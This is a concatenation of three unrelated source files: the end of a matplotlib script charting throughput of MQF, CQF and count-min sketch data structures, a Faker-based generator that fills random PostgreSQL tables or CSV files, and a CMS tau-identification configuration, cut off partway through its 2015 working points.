                  bottom=CountminKhmer_res[1][0],
                  alpha=opacity,
                  color='white',
                  edgecolor=CountminKhmerColor,
                  linewidth=line_width,
                  hatch='.',
                  label='CMS Khmer FPR 0.1')
# --- Buffered MQF stack ---
bmqf_fpr_0_0001_bar = plt.bar(bmqf_bar_positions, bmqf_res[0][3], bar_width- epsilon,
                  bottom=bmqf_res[1][3],
                  color=bmqfColor,
                  edgecolor=bmqfColor,
                  linewidth=line_width,
                  label='Buffered MQF FPR 0.0001')
bmqf_fpr_0_001_bar = plt.bar(bmqf_bar_positions, bmqf_res[0][2], bar_width-epsilon,
                  bottom=bmqf_res[1][2],
                  alpha=opacity,
                  color='white',
                  edgecolor=bmqfColor,
                  linewidth=line_width,
                  hatch='//',
                  label='Buffered MQF FPR 0.001')
bmqf_fpr_0_01_bar = plt.bar(bmqf_bar_positions, bmqf_res[0][1], bar_width-epsilon,
                  bottom=bmqf_res[1][1],
                  alpha=opacity,
                  color='white',
                  edgecolor=bmqfColor,
                  linewidth=line_width,
                  hatch='0',
                  label='Buffered MQF FPR 0.01')
bmqf_fpr_0_1_bar = plt.bar(bmqf_bar_positions, bmqf_res[0][0], bar_width-epsilon,
                  bottom=bmqf_res[1][0],
                  alpha=opacity,
                  color='white',
                  edgecolor=bmqfColor,
                  linewidth=line_width,
                  hatch='.',
                  label='Buffered MQF FPR 0.1')
# --- plain CMS stack ---
Countmin_fpr_0_0001_bar = plt.bar(Countmin_bar_positions, Countmin_res[0][3], bar_width- epsilon,
                  color=CountminColor,
                  bottom=Countmin_res[1][3],
                  edgecolor=CountminColor,
                  linewidth=line_width,
                  label='CMS FPR 0.0001')
Countmin_fpr_0_001_bar = plt.bar(Countmin_bar_positions, Countmin_res[0][2], bar_width-epsilon,
                  bottom=Countmin_res[1][2],
                  alpha=opacity,
                  color='white',
                  edgecolor=CountminColor,
                  linewidth=line_width,
                  hatch='//',
                  label='CMS FPR 0.001')
Countmin_fpr_0_01_bar = plt.bar(Countmin_bar_positions, Countmin_res[0][1], bar_width-epsilon,
                  bottom=Countmin_res[1][1],
                  alpha=opacity,
                  color='white',
                  edgecolor=CountminColor,
                  linewidth=line_width,
                  hatch='0',
                  label='CMS FPR 0.01')
Countmin_fpr_0_1_bar = plt.bar(Countmin_bar_positions, Countmin_res[0][0], bar_width-epsilon,
                  bottom=Countmin_res[1][0],
                  alpha=opacity,
                  color='white',
                  edgecolor=CountminColor,
                  linewidth=line_width,
                  hatch='.',
                  label='CMS FPR 0.1')
# Dataset labels under each cluster; y axis is throughput for the chosen op.
plt.xticks(cqf_bar_positions-5*bar_width, distributions, rotation=45)
plt.ylabel('Million of %s Per Second'%opType)
# Two separate legends: colors identify data structures, hatches identify FPRs.
legend_elements = [
Patch(facecolor=mqfColor,label='MQF',linewidth=0.5,edgecolor='black'),
Patch(facecolor=cqfColor,label='CQF',linewidth=0.5,edgecolor='black'),
Patch(facecolor=bmqfColor,label='Bufferd MQF',linewidth=0.5,edgecolor='black'),
Patch(facecolor=CountminKhmerColor,label='CMS Khmer',linewidth=0.5,edgecolor='black'),
Patch(facecolor=CountminColor,label='CMS',linewidth=0.5,edgecolor='black')
]
fpr_leged=[Patch(facecolor="black",label='0.0001',linewidth=0.5,edgecolor='black'),
Patch(facecolor="white",label='0.001',hatch='//',linewidth=0.5,edgecolor='black'),
Patch(facecolor="white",label='0.01',hatch='0',linewidth=0.5,edgecolor='black'),
Patch(facecolor="white",label='0.1',hatch='.',linewidth=0.5,edgecolor='black')
]
#l1=plt.legend(handles=legend_elements, bbox_to_anchor=(1.19, 0.95),
#           fancybox=True,title='Data Structures')
#l2=plt.legend(handles=fpr_leged, bbox_to_anchor=(1.171, 0.650),
#           fancybox=True,title='False Positive Rates')
l1=plt.legend(handles=legend_elements, bbox_to_anchor=(1., 0.95),
           fancybox=True,title='Data Structures')
l2=plt.legend(handles=fpr_leged, bbox_to_anchor=(1., 0.450),
           fancybox=True,title='False Positive Rates')
# The second plt.legend replaces the first; re-add both as artists.
ax.add_artist(l1)
ax.add_artist(l2)
# plt.legend(loc='best')
#ax.legend()
# sns.despine()
#plt.show()
# Save as <operation>.png next to the script.
fig.set_size_inches(5.5, 3.5)
fig.savefig(opType+'.png',bbox_inches='tight', dpi=fig.dpi)
|
<gh_stars>0
import psycopg2 as pg
from faker import Faker
from enum import Enum, IntEnum
from typing import NamedTuple, List
import random
import re
import string
from tqdm import tqdm
from pathlib import Path
class TargetOutput(IntEnum):
    # Where generated data is written: a live PostgreSQL database or CSV files.
    postgresql = 1
    csv = 2
class PostgresqlType(Enum):
    """Column types the generator can emit; the value is the SQL type name."""
    date = "date"
    timestamp = "timestamp"
    integer = "integer"
    float = "float"
    text = "text"
    # TODO jsonb
class Field(NamedTuple):
    """A single table column: identifier plus its SQL type."""
    name: str
    type: PostgresqlType
class Table(NamedTuple):
    """A table template: pg-normalized name plus its ordered column list."""
    name: str
    fields: List[Field]
def to_pg_name(name: str):
    """Normalize *name* into a PostgreSQL-friendly identifier: strip
    punctuation, join whitespace-separated words with '_', lowercase."""
    cleaned = re.sub("[" + string.punctuation + "]", "", name)
    words = cleaned.split()
    return "_".join(words).lower()
class range_field:
    """Iterator yielding *n* randomly generated Field definitions.

    Each field gets a faker-generated, pg-normalized name and a random
    PostgresqlType.
    """
    def __init__(self, fake, n):
        self.i = 0
        self.n = n
        self.fake = fake
        self.options_PostgresqlType = list(PostgresqlType)
    def __iter__(self):
        return self
    def __next__(self):
        # Guard clause: stop once n fields have been produced.
        if self.i >= self.n:
            raise StopIteration()
        self.i += 1
        field_name = to_pg_name(self.fake.name())
        return Field(field_name, random.choice(self.options_PostgresqlType))
def to_pg_schema(fake_table):
    """Build a CREATE TABLE IF NOT EXISTS statement for *fake_table*."""
    columns = ", ".join(f"{field.name} {field.type.value}" for field in fake_table.fields)
    return f"CREATE TABLE IF NOT EXISTS {fake_table.name} ( {columns})"
def generate_value(fake, field: PostgresqlType):
    """Render one random SQL literal for *field*'s type ("null" when the type
    is not handled)."""
    if field is PostgresqlType.text:
        # Strip single quotes so the quoted literal stays well-formed.
        return "'" + fake.name().replace("'", "") + "'"
    if field is PostgresqlType.timestamp:
        return f"'{fake.date_time()}'"
    if field is PostgresqlType.date:
        return f"'{fake.date()}'"
    if field is PostgresqlType.integer:
        return str(random.randint(-5000, 5000))
    if field is PostgresqlType.float:
        return str(random.randint(-5000, 5000) * random.random())
    return "null"
def generate_rows_postgresql(fake, table: Table, nb_rows: int) -> str:
    """Build one multi-row INSERT statement holding *nb_rows* random tuples."""
    columns = ",".join(f.name for f in table.fields)
    tuples = []
    for _ in range(0, nb_rows):
        tuples.append(f"({','.join([generate_value(fake,f.type) for f in table.fields])})")
    values = ",".join(tuples)
    return f"INSERT INTO {table.name} ({columns}) VALUES {values}"
def generate_rows_csv(fake, table: Table, nb_rows: int) -> str:
    """Render *nb_rows* comma-separated random rows, newline-joined (no header)."""
    lines = [
        ",".join(generate_value(fake, f.type) for f in table.fields)
        for _ in range(0, nb_rows)
    ]
    return "\n".join(lines)
def main(
    target,
    nb_tables,
    nb_min_cols,
    nb_max_cols,
    nb_min_rows,
    nb_max_rows,
    available_types,
    languages: List[str],
):
    """Generate *nb_tables* random tables and write them to *target*.

    NOTE(review): only TargetOutput.csv is implemented here — any other
    target is silently ignored (the __main__ block below drives the
    PostgreSQL path separately).  *available_types* is currently unused.
    NOTE(review): randint(nb_min_cols, nb_max_cols + 1) is inclusive of its
    upper bound, so up to nb_max_cols + 1 columns may be produced — confirm
    whether the +1 is intended.
    """
    fake = Faker(languages)
    if target == TargetOutput.csv:
        for t in tqdm(range(nb_tables)):
            # define template data
            fake_fields = list(
                range_field(fake, random.randint(nb_min_cols, nb_max_cols + 1))
            )
            fake_table = Table(to_pg_name(fake.name()), fake_fields)
            with Path(f"{fake_table.name}.csv").open("w") as f:
                # Header row first, then the randomized data rows.
                f.write(f"{','.join([f.name for f in fake_table.fields])}\n")
                rows = generate_rows_csv(
                    fake, fake_table, random.randint(nb_min_rows, nb_max_rows)
                )
                f.write(rows)
if __name__ == "__main__":
    # Direct PostgreSQL loading path: 29 random tables, each filled with a
    # random number of 1000-row INSERT batches.
    fake = Faker(["it_IT", "en_US", "ja_JP", "he_IL", "zh_CN"])
    for t in range(1, 30):
        # Define a random table template (faker name + 1-50 random columns).
        fake_fields = list(range_field(fake, random.randint(1, 50)))
        fake_table = Table(to_pg_name(fake.name()), fake_fields)
        conn = pg.connect(host="", database="", user="", password="")
        # Test database, so autocommit instead of explicit transactions.
        conn.set_session(autocommit=True)
        try:
            with conn.cursor() as cur:
                # create table
                cur.execute(to_pg_schema(fake_table))
                for i in tqdm(range(0, random.randint(1, 10000))):
                    # FIX: generate_rows_postgresql(fake, table, nb_rows) takes
                    # the Faker instance first; the original omitted it and
                    # raised TypeError on every batch.
                    rows = generate_rows_postgresql(fake, fake_table, 1000)
                    cur.execute(rows)
        finally:
            # FIX: the original opened one connection per table and never
            # closed any of them.
            conn.close()
        print(f"loaded table n{t}")
|
import FWCore.ParameterSet.Config as cms
##################### Updated tau collection with MVA-based tau-Ids rerun #######
# Used only in some eras
from RecoTauTag.Configuration.loadRecoTauTagMVAsFromPrepDB_cfi import *
from RecoTauTag.RecoTau.PATTauDiscriminationByMVAIsolationRun2_cff import *
### MVAIso 2017v2
## DBoldDM
# Raw BDT output of the 2017v2 MVA isolation (old decay modes), run on slimmedTaus
patTauDiscriminationByIsolationMVArun2v1DBoldDMwLTraw = patDiscriminationByIsolationMVArun2v1raw.clone(
    PATTauProducer = cms.InputTag('slimmedTaus'),
    Prediscriminants = noPrediscriminants,
    loadMVAfromDB = cms.bool(True),
    mvaName = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMwLT2017v2"), # name of the training you want to use
    mvaOpt = cms.string("DBoldDMwLTwGJ"), # option you want to use for your training (i.e., which variables are used to compute the BDT score)
    verbosity = cms.int32(0)
)
# VVLoose WP: multiplexes the raw output against a DB-stored working-point cut
patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMwLT = patDiscriminationByIsolationMVArun2v1VLoose.clone(
    PATTauProducer = cms.InputTag('slimmedTaus'),
    Prediscriminants = noPrediscriminants,
    toMultiplex = cms.InputTag('patTauDiscriminationByIsolationMVArun2v1DBoldDMwLTraw'),
    key = cms.InputTag('patTauDiscriminationByIsolationMVArun2v1DBoldDMwLTraw','category'),
    loadMVAfromDB = cms.bool(True),
    mvaOutput_normalization = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMwLT2017v2_mvaOutput_normalization"), # normalization of the training you want to use
    mapping = cms.VPSet(
        cms.PSet(
            category = cms.uint32(0),
            cut = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMwLT2017v2_WPEff95"), # this is the name of the working point you want to use
            variable = cms.string("pt"),
        )
    )
)
# Tighter WPs are clones of VVLoose with only the DB cut name (WPEff..) swapped.
# VLoose WP
patTauDiscriminationByVLooseIsolationMVArun2v1DBoldDMwLT = patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMwLT.clone()
patTauDiscriminationByVLooseIsolationMVArun2v1DBoldDMwLT.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMwLT2017v2_WPEff90")
# Loose WP
patTauDiscriminationByLooseIsolationMVArun2v1DBoldDMwLT = patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMwLT.clone()
patTauDiscriminationByLooseIsolationMVArun2v1DBoldDMwLT.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMwLT2017v2_WPEff80")
# Medium WP
patTauDiscriminationByMediumIsolationMVArun2v1DBoldDMwLT = patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMwLT.clone()
patTauDiscriminationByMediumIsolationMVArun2v1DBoldDMwLT.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMwLT2017v2_WPEff70")
# Tight WP
patTauDiscriminationByTightIsolationMVArun2v1DBoldDMwLT = patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMwLT.clone()
patTauDiscriminationByTightIsolationMVArun2v1DBoldDMwLT.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMwLT2017v2_WPEff60")
# VTight WP
patTauDiscriminationByVTightIsolationMVArun2v1DBoldDMwLT = patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMwLT.clone()
patTauDiscriminationByVTightIsolationMVArun2v1DBoldDMwLT.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMwLT2017v2_WPEff50")
# VVTight WP
patTauDiscriminationByVVTightIsolationMVArun2v1DBoldDMwLT = patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMwLT.clone()
patTauDiscriminationByVVTightIsolationMVArun2v1DBoldDMwLT.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMwLT2017v2_WPEff40")
# MVAIso DBoldDM Sequence: raw discriminator first, then all WP multiplexers
patTauDiscriminationByIsolationMVArun2v1DBoldDMwLTSeq = cms.Sequence(
    patTauDiscriminationByIsolationMVArun2v1DBoldDMwLTraw
    + patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMwLT
    + patTauDiscriminationByVLooseIsolationMVArun2v1DBoldDMwLT
    + patTauDiscriminationByLooseIsolationMVArun2v1DBoldDMwLT
    + patTauDiscriminationByMediumIsolationMVArun2v1DBoldDMwLT
    + patTauDiscriminationByTightIsolationMVArun2v1DBoldDMwLT
    + patTauDiscriminationByVTightIsolationMVArun2v1DBoldDMwLT
    + patTauDiscriminationByVVTightIsolationMVArun2v1DBoldDMwLT
)
## DBnewDM
# Raw BDT output of the 2017v2 MVA isolation (new decay modes), run on slimmedTaus
patTauDiscriminationByIsolationMVArun2v1DBnewDMwLTraw = patDiscriminationByIsolationMVArun2v1raw.clone(
    PATTauProducer = cms.InputTag('slimmedTaus'),
    Prediscriminants = noPrediscriminants,
    loadMVAfromDB = cms.bool(True),
    mvaName = cms.string("RecoTauTag_tauIdMVAIsoDBnewDMwLT2017v2"), # name of the training you want to use
    mvaOpt = cms.string("DBnewDMwLTwGJ"), # option you want to use for your training (i.e., which variables are used to compute the BDT score)
    verbosity = cms.int32(0)
)
# VVLoose WP: multiplexes the raw output against a DB-stored working-point cut
patTauDiscriminationByVVLooseIsolationMVArun2v1DBnewDMwLT = patDiscriminationByIsolationMVArun2v1VLoose.clone(
    PATTauProducer = cms.InputTag('slimmedTaus'),
    Prediscriminants = noPrediscriminants,
    toMultiplex = cms.InputTag('patTauDiscriminationByIsolationMVArun2v1DBnewDMwLTraw'),
    key = cms.InputTag('patTauDiscriminationByIsolationMVArun2v1DBnewDMwLTraw','category'),
    loadMVAfromDB = cms.bool(True),
    mvaOutput_normalization = cms.string("RecoTauTag_tauIdMVAIsoDBnewDMwLT2017v2_mvaOutput_normalization"), # normalization of the training you want to use
    mapping = cms.VPSet(
        cms.PSet(
            category = cms.uint32(0),
            cut = cms.string("RecoTauTag_tauIdMVAIsoDBnewDMwLT2017v2_WPEff95"), # this is the name of the working point you want to use
            variable = cms.string("pt"),
        )
    )
)
# Tighter WPs are clones of VVLoose with only the DB cut name (WPEff..) swapped.
# VLoose WP
patTauDiscriminationByVLooseIsolationMVArun2v1DBnewDMwLT = patTauDiscriminationByVVLooseIsolationMVArun2v1DBnewDMwLT.clone()
patTauDiscriminationByVLooseIsolationMVArun2v1DBnewDMwLT.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBnewDMwLT2017v2_WPEff90")
# Loose WP
patTauDiscriminationByLooseIsolationMVArun2v1DBnewDMwLT = patTauDiscriminationByVVLooseIsolationMVArun2v1DBnewDMwLT.clone()
patTauDiscriminationByLooseIsolationMVArun2v1DBnewDMwLT.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBnewDMwLT2017v2_WPEff80")
# Medium WP
patTauDiscriminationByMediumIsolationMVArun2v1DBnewDMwLT = patTauDiscriminationByVVLooseIsolationMVArun2v1DBnewDMwLT.clone()
patTauDiscriminationByMediumIsolationMVArun2v1DBnewDMwLT.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBnewDMwLT2017v2_WPEff70")
# Tight WP
patTauDiscriminationByTightIsolationMVArun2v1DBnewDMwLT = patTauDiscriminationByVVLooseIsolationMVArun2v1DBnewDMwLT.clone()
patTauDiscriminationByTightIsolationMVArun2v1DBnewDMwLT.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBnewDMwLT2017v2_WPEff60")
# VTight WP
patTauDiscriminationByVTightIsolationMVArun2v1DBnewDMwLT = patTauDiscriminationByVVLooseIsolationMVArun2v1DBnewDMwLT.clone()
patTauDiscriminationByVTightIsolationMVArun2v1DBnewDMwLT.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBnewDMwLT2017v2_WPEff50")
# VVTight WP
patTauDiscriminationByVVTightIsolationMVArun2v1DBnewDMwLT = patTauDiscriminationByVVLooseIsolationMVArun2v1DBnewDMwLT.clone()
patTauDiscriminationByVVTightIsolationMVArun2v1DBnewDMwLT.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBnewDMwLT2017v2_WPEff40")
# MVAIso DBnewDM Sequence: raw discriminator first, then all WP multiplexers
patTauDiscriminationByIsolationMVArun2v1DBnewDMwLTSeq = cms.Sequence(
    patTauDiscriminationByIsolationMVArun2v1DBnewDMwLTraw
    + patTauDiscriminationByVVLooseIsolationMVArun2v1DBnewDMwLT
    + patTauDiscriminationByVLooseIsolationMVArun2v1DBnewDMwLT
    + patTauDiscriminationByLooseIsolationMVArun2v1DBnewDMwLT
    + patTauDiscriminationByMediumIsolationMVArun2v1DBnewDMwLT
    + patTauDiscriminationByTightIsolationMVArun2v1DBnewDMwLT
    + patTauDiscriminationByVTightIsolationMVArun2v1DBnewDMwLT
    + patTauDiscriminationByVVTightIsolationMVArun2v1DBnewDMwLT
)
## DBoldDMdR0p3
# Raw BDT output of the 2017v2 MVA isolation (old decay modes, dR=0.3 isolation cone);
# uses the dR03 isolation-sum collections as MVA inputs
patTauDiscriminationByIsolationMVArun2v1DBoldDMdR0p3wLTraw = patDiscriminationByIsolationMVArun2v1raw.clone(
    PATTauProducer = cms.InputTag('slimmedTaus'),
    Prediscriminants = noPrediscriminants,
    loadMVAfromDB = cms.bool(True),
    mvaName = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMdR0p3wLT2017v2"), # name of the training you want to use
    mvaOpt = cms.string("DBoldDMwLTwGJ"), # option you want to use for your training (i.e., which variables are used to compute the BDT score)
    srcChargedIsoPtSum = cms.string('chargedIsoPtSumdR03'),
    srcFootprintCorrection = cms.string('footprintCorrectiondR03'),
    srcNeutralIsoPtSum = cms.string('neutralIsoPtSumdR03'),
    srcPUcorrPtSum = cms.string('puCorrPtSum'),
    srcPhotonPtSumOutsideSignalCone = cms.string('photonPtSumOutsideSignalConedR03'),
    verbosity = cms.int32(0)
)
# VVLoose WP: multiplexes the raw output against a DB-stored working-point cut
patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMdR0p3wLT = patDiscriminationByIsolationMVArun2v1VLoose.clone(
    PATTauProducer = cms.InputTag('slimmedTaus'),
    Prediscriminants = noPrediscriminants,
    toMultiplex = cms.InputTag('patTauDiscriminationByIsolationMVArun2v1DBoldDMdR0p3wLTraw'),
    key = cms.InputTag('patTauDiscriminationByIsolationMVArun2v1DBoldDMdR0p3wLTraw','category'),
    loadMVAfromDB = cms.bool(True),
    mvaOutput_normalization = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMdR0p3wLT2017v2_mvaOutput_normalization"), # normalization of the training you want to use
    mapping = cms.VPSet(
        cms.PSet(
            category = cms.uint32(0),
            cut = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMdR0p3wLT2017v2_WPEff95"), # this is the name of the working point you want to use
            variable = cms.string("pt"),
        )
    )
)
# Tighter WPs are clones of VVLoose with only the DB cut name (WPEff..) swapped.
# VLoose WP
patTauDiscriminationByVLooseIsolationMVArun2v1DBoldDMdR0p3wLT = patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMdR0p3wLT.clone()
patTauDiscriminationByVLooseIsolationMVArun2v1DBoldDMdR0p3wLT.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMdR0p3wLT2017v2_WPEff90")
# Loose WP
patTauDiscriminationByLooseIsolationMVArun2v1DBoldDMdR0p3wLT = patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMdR0p3wLT.clone()
patTauDiscriminationByLooseIsolationMVArun2v1DBoldDMdR0p3wLT.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMdR0p3wLT2017v2_WPEff80")
# Medium WP
patTauDiscriminationByMediumIsolationMVArun2v1DBoldDMdR0p3wLT = patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMdR0p3wLT.clone()
patTauDiscriminationByMediumIsolationMVArun2v1DBoldDMdR0p3wLT.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMdR0p3wLT2017v2_WPEff70")
# Tight WP
patTauDiscriminationByTightIsolationMVArun2v1DBoldDMdR0p3wLT = patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMdR0p3wLT.clone()
patTauDiscriminationByTightIsolationMVArun2v1DBoldDMdR0p3wLT.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMdR0p3wLT2017v2_WPEff60")
# VTight WP
patTauDiscriminationByVTightIsolationMVArun2v1DBoldDMdR0p3wLT = patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMdR0p3wLT.clone()
patTauDiscriminationByVTightIsolationMVArun2v1DBoldDMdR0p3wLT.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMdR0p3wLT2017v2_WPEff50")
# VVTight WP
patTauDiscriminationByVVTightIsolationMVArun2v1DBoldDMdR0p3wLT = patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMdR0p3wLT.clone()
patTauDiscriminationByVVTightIsolationMVArun2v1DBoldDMdR0p3wLT.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMdR0p3wLT2017v2_WPEff40")
# MVAIso DBoldDMdR0p3 Sequence: raw discriminator first, then all WP multiplexers
patTauDiscriminationByIsolationMVArun2v1DBoldDMdR0p3wLTSeq = cms.Sequence(
    patTauDiscriminationByIsolationMVArun2v1DBoldDMdR0p3wLTraw
    + patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMdR0p3wLT
    + patTauDiscriminationByVLooseIsolationMVArun2v1DBoldDMdR0p3wLT
    + patTauDiscriminationByLooseIsolationMVArun2v1DBoldDMdR0p3wLT
    + patTauDiscriminationByMediumIsolationMVArun2v1DBoldDMdR0p3wLT
    + patTauDiscriminationByTightIsolationMVArun2v1DBoldDMdR0p3wLT
    + patTauDiscriminationByVTightIsolationMVArun2v1DBoldDMdR0p3wLT
    + patTauDiscriminationByVVTightIsolationMVArun2v1DBoldDMdR0p3wLT
)
### MVAIso 2017v1 for Nano on top of MiniAODv1
## DBoldDM
# Raw BDT output of the 2017v1 MVA isolation (old decay modes), run on slimmedTaus
patTauDiscriminationByIsolationMVArun2v1DBoldDMwLTraw2017v1 = patDiscriminationByIsolationMVArun2v1raw.clone(
    PATTauProducer = cms.InputTag('slimmedTaus'),
    Prediscriminants = noPrediscriminants,
    loadMVAfromDB = cms.bool(True),
    mvaName = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMwLT2017v1"), # name of the training you want to use
    mvaOpt = cms.string("DBoldDMwLTwGJ"), # option you want to use for your training (i.e., which variables are used to compute the BDT score)
    verbosity = cms.int32(0)
)
# VVLoose WP: multiplexes the raw output against a DB-stored working-point cut
patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMwLT2017v1 = patDiscriminationByIsolationMVArun2v1VLoose.clone(
    PATTauProducer = cms.InputTag('slimmedTaus'),
    Prediscriminants = noPrediscriminants,
    toMultiplex = cms.InputTag('patTauDiscriminationByIsolationMVArun2v1DBoldDMwLTraw2017v1'),
    key = cms.InputTag('patTauDiscriminationByIsolationMVArun2v1DBoldDMwLTraw2017v1','category'),
    loadMVAfromDB = cms.bool(True),
    mvaOutput_normalization = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMwLT2017v1_mvaOutput_normalization"), # normalization of the training you want to use
    mapping = cms.VPSet(
        cms.PSet(
            category = cms.uint32(0),
            cut = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMwLT2017v1_WPEff95"), # this is the name of the working point you want to use
            variable = cms.string("pt"),
        )
    )
)
# Tighter WPs are clones of VVLoose with only the DB cut name (WPEff..) swapped.
# VLoose WP
patTauDiscriminationByVLooseIsolationMVArun2v1DBoldDMwLT2017v1 = patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMwLT2017v1.clone()
patTauDiscriminationByVLooseIsolationMVArun2v1DBoldDMwLT2017v1.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMwLT2017v1_WPEff90")
# Loose WP
patTauDiscriminationByLooseIsolationMVArun2v1DBoldDMwLT2017v1 = patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMwLT2017v1.clone()
patTauDiscriminationByLooseIsolationMVArun2v1DBoldDMwLT2017v1.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMwLT2017v1_WPEff80")
# Medium WP
patTauDiscriminationByMediumIsolationMVArun2v1DBoldDMwLT2017v1 = patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMwLT2017v1.clone()
patTauDiscriminationByMediumIsolationMVArun2v1DBoldDMwLT2017v1.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMwLT2017v1_WPEff70")
# Tight WP
patTauDiscriminationByTightIsolationMVArun2v1DBoldDMwLT2017v1 = patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMwLT2017v1.clone()
patTauDiscriminationByTightIsolationMVArun2v1DBoldDMwLT2017v1.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMwLT2017v1_WPEff60")
# VTight WP
patTauDiscriminationByVTightIsolationMVArun2v1DBoldDMwLT2017v1 = patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMwLT2017v1.clone()
patTauDiscriminationByVTightIsolationMVArun2v1DBoldDMwLT2017v1.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMwLT2017v1_WPEff50")
# VVTight WP
patTauDiscriminationByVVTightIsolationMVArun2v1DBoldDMwLT2017v1 = patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMwLT2017v1.clone()
patTauDiscriminationByVVTightIsolationMVArun2v1DBoldDMwLT2017v1.mapping[0].cut = cms.string("RecoTauTag_tauIdMVAIsoDBoldDMwLT2017v1_WPEff40")
# MVAIso DBoldDM Sequence (2017v1): raw discriminator first, then all WP multiplexers
patTauDiscriminationByIsolationMVArun2v1DBoldDMwLT2017v1Seq = cms.Sequence(
    patTauDiscriminationByIsolationMVArun2v1DBoldDMwLTraw2017v1
    + patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMwLT2017v1
    + patTauDiscriminationByVLooseIsolationMVArun2v1DBoldDMwLT2017v1
    + patTauDiscriminationByLooseIsolationMVArun2v1DBoldDMwLT2017v1
    + patTauDiscriminationByMediumIsolationMVArun2v1DBoldDMwLT2017v1
    + patTauDiscriminationByTightIsolationMVArun2v1DBoldDMwLT2017v1
    + patTauDiscriminationByVTightIsolationMVArun2v1DBoldDMwLT2017v1
    + patTauDiscriminationByVVTightIsolationMVArun2v1DBoldDMwLT2017v1
)
### MVAIso 2015 for Nano on top of MiniAODv2
## DBoldDM
# Raw BDT output of the 2015 (v1) MVA isolation (old decay modes), run on slimmedTaus
patTauDiscriminationByIsolationMVArun2v1DBoldDMwLTraw2015 = patDiscriminationByIsolationMVArun2v1raw.clone(
    PATTauProducer = cms.InputTag('slimmedTaus'),
    Prediscriminants = noPrediscriminants,
    loadMVAfromDB = cms.bool(True),
    mvaName = cms.string("RecoTauTag_tauIdMVADBoldDMwLTv1"), # name of the training you want to use
    mvaOpt = cms.string("DBoldDMwLT"), # option you want to use for your training (i.e., which variables are used to compute the BDT score)
    verbosity = cms.int32(0)
)
# VLoose WP (NOTE: 2015 training has no VVLoose point; VLoose is the loosest)
patTauDiscriminationByVLooseIsolationMVArun2v1DBoldDMwLT2015 = patDiscriminationByIsolationMVArun2v1VLoose.clone(
    PATTauProducer = cms.InputTag('slimmedTaus'),
    Prediscriminants = noPrediscriminants,
    toMultiplex = cms.InputTag('patTauDiscriminationByIsolationMVArun2v1DBoldDMwLTraw2015'),
    key = cms.InputTag('patTauDiscriminationByIsolationMVArun2v1DBoldDMwLTraw2015','category'),
    loadMVAfromDB = cms.bool(True),
    mvaOutput_normalization = cms.string("RecoTauTag_tauIdMVADBoldDMwLTv1_mvaOutput_normalization"), # normalization of the training you want to use
    mapping = cms.VPSet(
        cms.PSet(
            category = cms.uint32(0),
            cut = cms.string("RecoTauTag_tauIdMVADBoldDMwLTv1_WPEff90"), # this is the name of the working point you want to use
            variable = cms.string("pt"),
        )
    )
)
# Tighter WPs are clones of VLoose with only the DB cut name (WPEff..) swapped.
# Loose WP
patTauDiscriminationByLooseIsolationMVArun2v1DBoldDMwLT2015 = patTauDiscriminationByVLooseIsolationMVArun2v1DBoldDMwLT2015.clone()
patTauDiscriminationByLooseIsolationMVArun2v1DBoldDMwLT2015.mapping[0].cut = cms.string("RecoTauTag_tauIdMVADBoldDMwLTv1_WPEff80")
# Medium WP
